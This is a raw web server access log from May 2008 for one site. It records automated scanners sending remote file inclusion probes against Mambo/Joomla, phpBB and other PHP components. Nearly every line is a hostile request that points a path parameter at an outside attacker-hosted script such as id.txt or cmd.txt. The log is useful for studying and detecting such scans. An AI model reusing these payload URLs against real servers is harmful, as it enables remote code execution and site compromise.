200.234.200.124 - - [24/May/2008:12:55:03 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:12:55:03 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:12:55:03 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:12:55:03 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:12:55:04 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:55:20 -0700] "GET /logs/access.log//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:55:25 -0700] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:55:27 -0700] "GET //index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:12:55:35 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:12:55:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:12:55:36 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:12:55:36 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:12:55:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:12:55:36 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:55:43 -0700] "GET /logs/access_080327.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:12:55:47 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:55:51 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:55:52 -0700] "GET //skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:55:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:56:08 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:12:56:13 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:12:56:14 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:15 -0700] "GET /logs/access_080218.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:15 -0700] "GET /logs/access_080218.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:16 -0700] "GET /logs/access_080218.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:18 -0700] "GET /logs/access_080218.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:19 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:19 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:19 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:19 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:19 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:20 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:20 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:56:20 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:56:22 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:56:22 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:57:01 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:57:01 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:57:10 -0700] "GET /logs/index2.php?x=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:57:10 -0700] "GET /index2.php?x=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:57:27 -0700] "GET /logs/index2.php?x=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:57:27 -0700] "GET /index2.php?x=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:12:57:37 -0700] "GET /logs/access_080220.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:12:57:38 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:12:57:38 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:58:01 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:58:01 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:12:58:10 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.243.253.159 - - [24/May/2008:12:58:16 -0700] "GET /logs//calendar.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [24/May/2008:12:58:16 -0700] "GET //calendar.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.4.210 - - [24/May/2008:12:58:33 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.98.4.210 - - [24/May/2008:12:58:35 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:59:11 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:59:16 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.4.210 - - [24/May/2008:12:59:35 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.98.4.210 - - [24/May/2008:12:59:37 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.98.4.210 - - [24/May/2008:12:59:37 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:12:59:37 -0700] "GET /index.php?configFile=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:59:38 -0700] "GET /logs//bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:59:38 -0700] "GET //bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:59:45 -0700] "GET /logs/access_080327.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [24/May/2008:12:59:51 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.needvisa.net/card/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [24/May/2008:12:59:52 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.needvisa.net/card/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [24/May/2008:12:59:52 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.needvisa.net/card/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:13:00:33 -0700] "GET /logs/access.log/index.php?incl=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:13:00:36 -0700] "GET /index.php?incl=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:13:00:36 -0700] "GET /logs/index.php?incl=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:01:06 -0700] "GET /logs/access_080301.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:13:01:14 -0700] "GET /logs/access_080212.log/index.php?incl=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:13:01:36 -0700] "GET /logs/index.php?configFile=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:13:01:42 -0700] "GET /index.php?configFile=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:13:01:49 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%20http://www.crazywap.co.uk/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:13:01:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%20http://www.crazywap.co.uk/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:13:01:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%20http://www.crazywap.co.uk/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:13:01:51 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:13:01:56 -0700] "GET /logs/index.php?configFile=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:13:01:56 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%20http://www.crazywap.co.uk/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:13:01:57 -0700] "GET /index.php?configFile=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:13:01:59 -0700] "GET /logs/access_080211.log/index.php?configFile=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.243.253.159 - - [24/May/2008:13:02:15 -0700] "GET /logs/trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [24/May/2008:13:02:15 -0700] "GET /trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
143.248.136.2 - - [24/May/2008:13:02:25 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
143.248.136.2 - - [24/May/2008:13:02:25 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:13:03:20 -0700] "GET /logs/trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:13:03:20 -0700] "GET /trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:03:25 -0700] "GET /logs/access_080325.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:03:25 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:03:26 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:13:03:43 -0700] "GET /logs/index.php?incl=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [24/May/2008:13:03:50 -0700] "GET /index.php?incl=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:03:57 -0700] "GET /logs/access_080421.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:04:08 -0700] "GET /logs/access_071223.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:04:22 -0700] "GET /logs/access_071225.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:04:35 -0700] "GET /logs/access_080220.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:04:36 -0700] "GET /logs/access_080201.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:04:37 -0700] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:04:40 -0700] "GET /logs/access_080101.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [24/May/2008:13:04:47 -0700] "GET /logs/access.log//main.php?sayfa=http://kecebong.justfree.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
143.248.136.2 - - [24/May/2008:13:04:49 -0700] "GET /logs/access_080218.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [24/May/2008:13:04:52 -0700] "GET //main.php?sayfa=http://kecebong.justfree.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [24/May/2008:13:04:52 -0700] "GET /logs//main.php?sayfa=http://kecebong.justfree.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:04:58 -0700] "GET /logs/access_080128.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:04:59 -0700] "GET /logs/access_080219.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [24/May/2008:13:05:17 -0700] "GET /logs//main.php?sayfa=http://kecebong.justfree.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [24/May/2008:13:05:17 -0700] "GET //main.php?sayfa=http://kecebong.justfree.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:05:40 -0700] "GET /logs/access_071214.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:05:41 -0700] "GET /logs/access_080122.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:13:05:41 -0700] "GET /logs/access_080325.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:13:05:41 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
